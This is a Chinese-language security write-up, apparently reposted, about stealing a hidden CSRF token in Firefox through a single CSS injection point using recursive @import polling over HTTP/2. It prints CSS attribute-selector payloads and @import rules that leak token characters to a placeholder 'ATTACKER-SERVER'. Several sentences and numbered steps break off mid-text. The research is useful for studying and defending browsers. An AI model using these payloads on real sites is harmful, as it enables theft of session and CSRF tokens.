在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
0x00 前言 几个月之前,我在Firefox中找到了一个漏洞( CVE-2019-17016 )。在研究过程中,我发现了在Firefox浏览器中利用CSS的一种数据窃取技术,可以通过单个注入点窃取数据,这里我想与大家一起分享相关研究成果。 0x01 背景知识 为了演示方便,这里假设我们想窃取 <input type="hidden" name="csrftoken" value="SOME_VALUE"> 我们无法使用脚本(可能是因为CSP),因此想寻找基于样式的注入方法。传统方法是使用属性选择器,如下所示: input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); } input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } ... input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); } 如果应用了CSS规则,那么攻击者就能收到HTTP请求,从而获取到令牌的第1个字符。随后,攻击者需要准备另一个样式表,其中包含已窃取的第1个字符,如下所示: input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); } input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); } ... input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); } 通常情况下,攻击者需要重新加载 在2018年, Pepe Vila 提出了一个非常不错的想法,可以在Chrome浏览器中滥用 CSS递归import 方式,通过单个注入点完成相同任务。在2019年,Nathanial Lattimer( @d0nutptr )重新提出了相同 技巧 ,但稍微做了点改动。下面我稍微总结一下Lattimer的方法,这种方法与本文的思想比较接近(但我在此次研究过程中并不了解Lattimer之前的成果,因此可能有人会认为我在重复造轮子)。 简而言之,第一次注入用到了一堆 @import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ... 核心思想如下: 1、在一开始,只有第1个 2、第1个 3、当泄露的第1个令牌到达 4、当第2个泄露字符到达 这种技术之所以行之有效,是因为Chrome会采用异步方式处理 0x02 Firefox及样式表处理 前面提到的方法并不适用于Firefox,与Chrome浏览器相比,Firefox对样式表的处理方式大不相同。这里我以几个案例来说明其中差异。 首先,Firefox会采用同步方式处理样式表。因此,当样式表中有多个 <style> @import '/polling/0'; @import '/polling/1'; @import '/polling/2'; </style> 假设第1个 我们可以将所有 <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> 在上面代码中,Firefox会分别处理所有样式表,因此页面会立刻变蓝色,其他 但这里还有另一个问题,假设我们想窃取包含10个字符的令牌: <style>@import '/polling/0';</style> <style>@import '/polling/1';</style> <style>@import '/polling/2';</style> ... <style>@import '/polling/10';</style> Firefox会立即将10个 0x03 HTTP/2 6个连接的限制条件由TCP层决定,因此到单个服务器只能有6个TCP连接同时存在。在这种情况下,我认为HTTP/2可能派上用场。HTTP/2有许多优点,比如我们可以通过单个连接发送多个HTTP请求(也就是所谓的多路传输( multiplexing )),从而大大提升性能。 Firefox对单个HTTP/2连接的并发请求数也有限制,但默认情况下限制数为 0x04 利用方式 现在一切准备就绪,我们的主要利用场景如下: 1、利用代码基于HTTP/2。 2、通过 3、通过 4、为了强制Firefox向同一个服务器发起2个TCP连接,这里用到了两个端点,分别为 5、端点 我创建了一个 测试平台 ,目标是通过这种方式窃取 此外,我还在GitHub上托管了 PoC代码 ,攻击过程可参考 此处视频 。 有趣的是,由于我们使用的是HTTP/2,因此攻击过程非常快速,不到3秒就能获取到整个令牌。 0x05 总结 在本文中,我演示了如何利用1个注入点,在不想重载页面的情况下,通过CSS窃取数据。这里主要涉及2个要点: 1、将 2、为了绕过TCP并发连接数限制,我们需要通过HTTP/2发起攻击。 以上所述是小编给大家介绍的在Firefox浏览器中利用CSS窃取数据,希望对大家有所帮助,也非常感谢大家对极客世界网站的支持! |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论